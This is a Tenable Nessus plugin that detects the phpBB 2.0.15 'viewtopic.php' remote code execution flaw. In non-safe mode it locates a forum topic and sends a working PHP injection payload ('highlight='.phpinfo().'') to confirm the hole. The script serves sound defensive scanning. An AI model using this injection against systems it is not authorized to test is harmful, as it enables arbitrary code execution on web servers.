#
# (C) Tenable Network Security
#


  desc["english"] = "
The remote host is running a version of phpBB that allows attackers to
inject arbitrary PHP code to the 'viewtopic.php' script to be executed
within the context of the web server userid. 

See also : http://www.securityfocus.com/archive/1/403631/30/0/threaded
Solution : Upgrade to phpBB version 2.0.16 or later.
Risk factor : High";
 

if (description) {
  script_id(18589);
  script_version("$Revision: 1.2 $");

  script_cve_id("CAN-2005-2086");
  script_bugtraq_id(14086);

  name["english"] = "phpBB <= 2.0.15 Remote Code Execution Vulnerability";
  script_name(english:name["english"]);
 
  script_description(english:desc["english"]);

  summary["english"] = "Checks for remote code execution vulnerability in phpBB <= 2.0.15";
  script_summary(english:summary["english"]);
 
  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005 Tenable Network Security");

  script_dependencie("phpbb_detect.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/phpBB"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  ver = matches[1];
  dir = matches[2];

  # If safe checks are enabled...
  if (safe_checks()) {
    # Versions <= 2.0.15 are reportedly vulnerable.
    if (ver =~ "^([01]\..*|2\.0\.([0-9]|1[0-5])([^0-9]|$))") {
      desc = str_replace(
        string:desc["english"],
        find:"Solution :",
        replace:string(
          "***** Nessus has determined the vulnerability exists on the remote\n",
          "***** host just by looking at the application's version number.\n",
          "\n",
          "Solution :"
        )
      );
      security_hole(port:port, data:desc);
      exit(0);
    }
  }
  # Otherwise we'll try to exploit the flaw.
  else {
    # First we need a forum number.
    req = http_get(item:string(dir, "/index.php"), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    pat = '<a href="viewforum\\.php\\?f=([0-9]+)"';
    matches = egrep(pattern:pat, string:res, icase:TRUE);
    if (matches) {
      foreach match (split(matches)) {
        match = chomp(match);
        forum = eregmatch(pattern:pat, string:match);
        if (!isnull(forum)) {
          forum = forum[1];
          break;
        }
      }
    }

    if (isnull(forum)) {
      if (log_verbosity > 1) debug_print("couldn't find a forum to use!", level:0);
    }
    else {
      # Next we need a topic number.
      req = http_get(
        item:string(
          dir, "/viewforum.php?",
          "f=", forum
        ), 
        port:port
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      pat = '<a href="viewtopic\\.php\\?t=([0-9]+)"';
      matches = egrep(pattern:pat, string:res, icase:TRUE);
      if (matches) {
        foreach match (split(matches)) {
          match = chomp(match);
          topic = eregmatch(pattern:pat, string:match);
          if (!isnull(topic)) {
            topic = topic[1];
            break;
          }
        }
      }

      if (isnull(topic)) {
        if (log_verbosity > 1) debug_print("couldn't find a topic to use!", level:0);
      }
      else {
        # Finally, we can try to exploit the flaw.
        req = http_get(
          item:string(
            dir, "/viewtopic.php?",
            "t=", topic, "&",
            # nb: we'll try to run phpinfo().
            "highlight='.phpinfo().'"
          ), 
          port:port
        );
        res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res == NULL) exit(0);

        # There's a problem if it looks like the output of phpinfo().
        if ("PHP Version" >< res) {
          security_hole(port);
          exit(0);
        }
      }
    }
  }
}
